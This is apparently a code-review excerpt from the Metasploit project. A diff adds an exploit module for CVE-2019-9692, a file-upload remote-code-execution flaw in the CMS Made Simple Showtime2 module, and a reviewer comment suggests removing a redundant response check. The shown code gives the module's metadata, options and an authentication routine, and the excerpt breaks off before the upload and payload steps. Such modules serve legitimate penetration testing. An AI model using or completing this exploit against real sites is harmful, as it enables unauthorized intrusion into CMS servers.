modules/exploits/multi/http/cmsms_showtime2_rce.rb

```diff
@@ -0,0 +1,165 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => "CMS Made Simple (CMSMS) Showtime2 File Upload RCE",
+      'Description' => %q(
+        This module exploits a File Upload vulnerability that lead in a RCE in the
+        Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS) throught users with
+        the "Use Showtime2" privilege.
+
+        The vulnerability exists in the Showtime2 module, where the class
+        "class.showtime2_image.php" does not ensure that a watermark file
+        has a standard image file extension (GIF, JPG, JPEG, or PNG).
+
+        Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0,
+        3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'Daniele Scanu', # Discovery & PoC
+          'Fabio Cogno' # Metasploit module
+        ],
+      'References' =>
+        [
+          ['CVE', '2019-9692'],
+          ['CWE', '434'],
+          ['EDB', '46546'],
+          ['URL', 'https://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285'],
+          ['URL', 'http://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47']
+        ],
+      'Platform' => 'php',
+      'Arch' => ARCH_PHP,
+      'Targets' =>
+        [
+          ['3.6.2', {}]
+        ],
+      'Privileged' => false,
+      'DisclosureDate' => "Mar 11 2019",
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "Base CMS Made Simple directory path", '/']),
+        OptString.new('USERNAME', [true, "Username to authenticate with", '']),
+        OptString.new('PASSWORD', [false, "Password to authenticate with", ''])
+      ]
+    )
+  end
+
+  def do_login
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'),
+      'vars_post' => {
+        'username' => datastore['username'],
+        'password' => datastore['password'],
+        'loginsubmit' => 'Submit'
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+
+    if res && res.code == 302 && res.get_cookies =~ /__c=([^deleted].+?);/
```

Comment:
No need to check `res` here, as it is checked above.

```suggestion
    if res.code == 302 && res.get_cookies =~ /__c=([^deleted].+?);/
```